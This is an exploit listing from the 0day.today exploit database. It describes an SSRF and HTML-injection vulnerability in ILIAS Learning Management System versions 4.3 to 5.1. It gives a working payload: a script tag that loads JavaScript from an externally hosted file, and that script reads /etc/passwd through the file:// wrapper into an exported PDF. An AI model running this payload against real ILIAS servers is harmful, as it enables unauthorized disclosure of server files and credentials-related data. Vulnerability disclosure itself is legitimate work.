[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ILIAS Learning Management System 4.3 - SSRF Vulnerability

Author
kx1z0
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35365
Category
web applications
Date add
02-12-2020
Platform
multiple
# Exploit Title: ILIAS Learning Management System 4.3 - SSRF 
# Exploit Author: Dot/kx1z0
# Vendor Homepage: https://www.ilias.de/
# Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
# Version: 4.3-5.1
# Tested on: Linux
# Description
We can create portfolios, export them to PDF and download them.
The issue is that there is an HTML Injection, and if we inject HTML
into the portfolio, when it is exported to PDF, it will be rendered.
So we can take advantage that it is running under the wrapper file://
to inject an XMLHttpRequest requesting the local file we want, that
when downloading the PDF, we can see the content of that file

# Exploit
We cannot inject the XMLHttpRequest directly into the content of the
portfolio, as there is something blocking it. So we will have to host
a script in our own server and invoke it from the portfolio

We insert this in the portfolio:
<script src=host.com/test.js> </script>

Script in our server:
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();

So, finally, we will only have to download the PDF and there, will be
the content of the file we have requested.

#  0day.today [2024-12-24]  #